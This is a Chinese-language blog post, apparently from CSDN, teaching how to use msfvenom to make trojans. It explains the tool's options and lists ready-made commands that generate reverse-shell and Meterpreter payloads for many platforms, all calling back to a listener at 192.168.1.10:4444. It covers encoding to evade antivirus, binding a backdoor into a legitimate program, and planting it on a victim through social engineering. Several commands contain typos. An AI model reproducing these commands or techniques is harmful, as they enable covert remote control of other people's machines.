【木马生成工具】Msfvenom介绍及利用

最新推荐文章于 2024-10-10 16:46:21 发布
最新推荐文章于 2024-10-10 16:46:21 发布
阅读量1.6k 收藏 9
点赞数 10
分类专栏: 网络安全 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aheyor/article/details/140160008
版权

简介

msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。

参数介绍

-l

列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

-p

指定需要使用的payload(攻击荷载)。
在这里插入图片描述

-f

指定输出格式

Executable formats:Asp、aspx、aspx-exe、axis2、dll、elf、elf-so、exe、exe-only、exe-service、exe-smallhta-psh、jar、jsp、loop-vbs、macho、msi、msi-nouac、osx-app、psh、psh-cmd、psh-net、psh-reflection、python-reflection、vba、vba-exe、vba-psh、vbs、war;
  • 1
Transform formats:base32、base64、bash、c、csharp、dw、dword、hex、java、js_be、js_le、num、perl、pl、powershell、ps1、py、python、raw、rb、ruby、sh、vbapplication、vbscript;
  • 1
-e

指定需要使用的encoder(编码器)编码免杀。
在这里插入图片描述

-a

指定payload的目标架构

选择架构平台:x86 | x64 | x86_64
Platforms:windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe
  • 1
  • 2
-o

保存payload文件输出。

-b

设定规避字符集,比如: '\x00\xff'避免使用的字符

-n

为payload预先指定一个NOP滑动长度

-s

设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。

-i

指定payload的编码次数

-c

指定一个附加的win32 shellcode文件

-x

指定一个自定义的可执行文件作为模板
例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。

-k

保护模板程序的动作,注入的payload作为一个新的进程运行
例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。

-v

指定一个自定义的变量,以确定输出格式

Mcfvenom实例

普通生成
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f exe -o /root/shell.exe
  • 1
编码处理
msfvenom -p windows/meterpreter/reverse_tcp -i 3 -e x86/shikita_ga_nai lhost=192.168.1.10 port=4444 -f exe -o /root/shell.exe
  • 1
捆绑
msfvenom -p windows/meterpreter/reverse_tcp -p latform windows -a x64 -x /root/baidunetdisk.exe -k lhost=192.168.1.10 port=4444 -f exe -o /root/shell.exe
  • 1
Windows
msfvenom -platform windows -a x86 -p windows/meterpreter/reverse_tcp  lhost=192.168.1.10 port=4444 -f exe -o /root/shell.exe
  • 1
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp  lhost=192.168.1.10 port=4444 -f elf > shell.elf
  • 1
Mac
msfvenom -p osx/x86/shell_reverse_tcp  lhost=192.168.1.10 port=4444 -f macho > shell.macho
  • 1
Php
msfvenom -p php/meterpreter/reverse_tcp  lhost=192.168.1.10 port=4444 -f raw
  • 1
Asp
msfvenom -p windows/meterpreter/reverse_tcp  lhost=192.168.1.10 port=4444 -f asp
  • 1
Aspx
msfvenom -p windows/meterpreter/reverse_tcp  lhost=192.168.1.10 port=4444 -f aspx
  • 1
Jsp
msfvenom -p java/jsp_shell_reverse_tcp  lhost=192.168.1.10 port=4444 -f raw
  • 1
War
msfvenom -p windows/meterpreter/reverse_tcp  lhost=192.168.1.10 port=4444 -f war
  • 1
Bash
msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.10 port=4444 -f bash
  • 1
Perl
msfvenom -p cmd/unix/reverse_perl lhost=192.168.1.10 port=4444 -f raw
  • 1
Python

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f raw
  • 1
  • 2

应用实例

msfvenom的shell在windows中的使用

1.使用msfvenom生成windows可执行后门文件
在这里插入图片描述

2.将后门文件放入windows机器中(现实中可使用社工的方法进行诱导)
在这里插入图片描述

3.设置监听
在这里插入图片描述

4.启动监听,并运行密码文件后成功获取到shell
在这里插入图片描述

Aheyor编程1041
关注
专栏目录
msfvenom-shll生成工具是msf 组件——Metasploit(MSF)使用详解
代码审计
04-22 2543
抽离 专职生成对应的payload异或编码 -e x86/shikata_ga_nai -i 3linux 生成 payloadphp 生成 payloadpython 生成 payloadwindows 生产payload 抽离 专职生成对应的payload 异或 编码 免杀 msfvenom -l platforms 支持平台 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=55212 -f
利用msfvenom制作windows木马及免杀马
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马msfvenom -a x86 --platform window...
Metasploit渗透测试之MSFvenom
最新发布
YJ_12340的博客
10-10 1091
到目前为止,你应该已经对MSFvenom不陌生了,因为在之前的文章中已经介绍多次了。MSFvenom是用于生成有效攻击载荷和编码的工具。它由msfpayload和msfencode演变而来。并于2015年6月8日取代了这两者。在本文中,我们将更深入地研究可用的有效载荷,了解为什么编码器在规避安全检测时很有用,了解可用的可执行文件,转换输出格式等等。
msfvenom常用参数
m0_61506558的博客
08-29 1639
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。保护模板程序的动作,注入的payload作为一个新的进程运行。指定需要使用的encoder(编码器)编码免杀。指定需要使用的payload(攻击荷载)。...
msfvenom参数总结
Fng的博客
09-19 1224
kali中的msfvenom取代了msfpayload和msfencode,常用于生成木马
Msfvenom介绍利用
热门推荐
小小猪的博客
11-20 2万+
Msfvenom介绍利用 简介: msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 参数介绍: -l, --list .
Msfvenom
LIVE
04-04 1548
windows: c:\metasploit>msfvenom.bat -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.10.199 LPORT=3080 -e x86/shikata_ga_nai -i 3 -f exe > c:\2.exe c:\metasploit>m...
msfvenom 生成php木马,利用msfvenom生成木马程序
weixin_36051235的博客
03-26 1923
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.二,工具:MSF三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线四,过程:1,查看帮助命令:root#msfvenom-h结果:2,生成meterpreterpayload并利用shikata_g...
msf之msfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 4164
msfvenom的使用
利用msfvenom生成木马文件反弹shell
dreamthe的博客
11-19 4635
1.安装靶机和攻击机 首先自己是在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win 7 这里记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。 kali的下载地址Get Kali | Kali Linux: 在虚拟机里面直接选择打开就可以了。 攻击机 kali ip是192.168.3.138 靶机 win server 2008 R2 ip是192.168.3.147 ...
利用msfvenom生成木马:E025渗透测试工具详解
本资源是一份关于渗透测试的教程,重点介绍了如何在E025课程中利用Metasploit Framework (msfvenom) 工具生成木马进行渗透测试。课程涉及的具体步骤和环境如下: 1. **课程背景与目标**: 这门课程旨在教授学生...
msfvenom木马生成与攻防实战:了解Windows木马生成参数
介绍msfvenom木马生成 ## 1.1 什么是msfvenom Msfvenom是Metasploit框架提供的一个强大的工具,用于生成各种类型的恶意软件(包括木马)。它是Metasploit框架的一部分,由Offensive Security开发和维护。 ## ...
msfvenom
煮酒闲谈
09-22 4337
摘要在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以该博文记录一些关于msfvenom使用技巧。msfvenom:>>> msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 原理:msfvenom是msfp
msfvenom介绍
weixin_46483815的博客
05-11 2581
主要介绍msfvenom 和一些实验
msf的实战使用——msfvenom
tomyyyyy
05-11 2958
msf的实战使用——msfvenom 文章目录msf的实战使用——msfvenommsfvenom命令的参数常用命令木马免杀姿势1:Py2exe生成exe姿势2:PyInstaller生成exe姿势3:编译c源码 msfvenom命令的参数 Options: -l, --list <type> # 列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, platforms, archs, encrypt,
msfvenom java_Msfvenom 参数实例
weixin_30996983的博客
02-28 202
参数说明:–p(- -payload-options)添加载荷payload。载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!!(- -payload-options 列出payload选项)–l查看所有payload encoder nops。–f(- -help-...
[转载]msfvenom隐藏的参数
gclome的博客
03-14 710
原文链接:https://mp.weixin.qq.com/s?__biz=Mzg2NTA4OTI5NA==&mid=2247484720&idx=1&sn=2772684974b506ee81f7e8def15a37ed&chksm=ce5e2751f929ae479018f5d150007a5a6f9e95a92d63ce27c12e07d02e48c790ba...
metasploit---msfvenom
孤的博客
11-21 1548
在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenommsfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以...
msfvenom介绍以及基本使用
H_zcn的博客
10-22 1574
metasploit是一个非常强大的攻击,它不仅仅是能对windows系统进行攻击,还支持全平台的攻击,例如Linux,macOS,安卓手机等等,在上一篇metasploit框架介绍中我们简单的了解了metasploit里一些基本框架与命令,以及还体验了最基本的攻击流程,接下来我将进一步的介绍metasploit另外的一些功能与使用方法。msfvenom 有病毒,毒液的意思,它有来生成后门的功能。msfvenom是msfpayload(攻击载荷)和msfencode(编码加密)的组合。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Aheyor编程1041

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值